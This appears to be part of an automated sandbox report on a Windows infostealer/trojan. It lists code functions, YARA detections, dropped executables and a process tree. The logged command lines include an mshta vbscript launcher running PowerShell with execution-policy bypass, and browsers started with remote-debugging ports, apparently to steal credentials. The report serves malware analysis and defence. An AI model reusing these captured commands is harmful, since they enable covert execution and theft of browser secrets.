Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6C45B0 0_2_6C6C45B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C72C650 0_2_6C72C650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C72E6E0 0_2_6C72E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C76E6E0 0_2_6C76E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F46D0 0_2_6C6F46D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C750700 0_2_6C750700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FA7D0 0_2_6C6FA7D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C71E070 0_2_6C71E070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C798010 0_2_6C798010
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C79C000 0_2_6C79C000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7AC0B0 0_2_6C7AC0B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E00B0 0_2_6C6E00B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6C8090 0_2_6C6C8090
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8261B0 0_2_6C8261B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C738140 0_2_6C738140
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C746130 0_2_6C746130
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7B4130 0_2_6C7B4130
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D01E0 0_2_6C6D01E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C758260 0_2_6C758260
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C768250 0_2_6C768250
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8562C0 0_2_6C8562C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7A8220 0_2_6C7A8220
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C79A210 0_2_6C79A210
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C79E2B0 0_2_6C79E2B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7A22A0 0_2_6C7A22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C766370 0_2_6C766370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D2370 0_2_6C6D2370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7EC360 0_2_6C7EC360
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D8340 0_2_6C6D8340
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_00725C83 20_2_00725C83
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_0072735A 20_2_0072735A
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_00768860 20_2_00768860
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_00724DE0 20_2_00724DE0
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_00724B30 20_2_00724B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_010231A8 21_2_010231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_01027049 21_2_01027049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_01028860 21_2_01028860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_010278BB 21_2_010278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_00FE4B30 21_2_00FE4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_01022D10 21_2_01022D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_00FE4DE0 21_2_00FE4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_01017F36 21_2_01017F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_0102779B 21_2_0102779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FEE530 23_2_00FEE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01006192 23_2_01006192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01028860 23_2_01028860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FE4B30 23_2_00FE4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01022D10 23_2_01022D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FE4DE0 23_2_00FE4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01000E13 23_2_01000E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_010231A8 23_2_010231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01027049 23_2_01027049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_0102779B 23_2_0102779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01001602 23_2_01001602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_010278BB 23_2_010278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01003DF1 23_2_01003DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01017F36 23_2_01017F36
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C85DAE0 appears 49 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6F9B10 appears 49 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C85D930 appears 40 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6F3620 appears 52 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6694D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C65CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C8509D0 appears 215 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 01018E10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00FFDF80 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00FFD64E appears 66 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00FFD942 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00FFD663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00FF80C0 appears 263 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00FF7A00 appears 38 times
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: String function: 007380C0 appears 130 times
Source: file.exe, 00000000.00000002.2445370306.000000006C6B2000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: amsi32_8712.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8712, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: file.exe Static PE information: Section: xxdbzcjj ZLIB complexity 0.9948846726190477
Source: file1[1].exe.23.dr Static PE information: Section: ZLIB complexity 0.9992582208188153
Source: file1[1].exe.23.dr Static PE information: Section: ytlmplcn ZLIB complexity 0.994779892714201
Source: file1.exe.23.dr Static PE information: Section: ZLIB complexity 0.9992582208188153
Source: file1.exe.23.dr Static PE information: Section: ytlmplcn ZLIB complexity 0.994779892714201
Source: random[1].exe0.23.dr Static PE information: Section: xxdbzcjj ZLIB complexity 0.9948846726190477
Source: 3160604f40.exe.23.dr Static PE information: Section: xxdbzcjj ZLIB complexity 0.9948846726190477
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@95/332@65/32
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C687030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C687030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\M4PJU0MA.htm
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8744:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe File created: C:\Users\user\AppData\Local\Temp\c397cfa7-4e59-49ce-b9b9-c6e3f633cda4.tmp
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2181905406.000000001D4A9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269966395.000000001D49D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756308716.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005A79000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2767812066.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768557455.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2877562568.0000000005624000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005605000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890347826.000000000562E000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3054993967.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039810033.0000000005C19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe ReversingLabs: Detection: 36%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2168,i,14858037877617579678,5688177104923091675,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2224,i,5174629620199250997,17853157087695469379,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7124 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7304 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsECAFHIIJJE.exe "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe "C:\Users\user\AppData\Local\Temp\1005627001\file1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7420 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close")
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2168,i,14858037877617579678,5688177104923091675,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2224,i,5174629620199250997,17853157087695469379,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7124 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7304 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
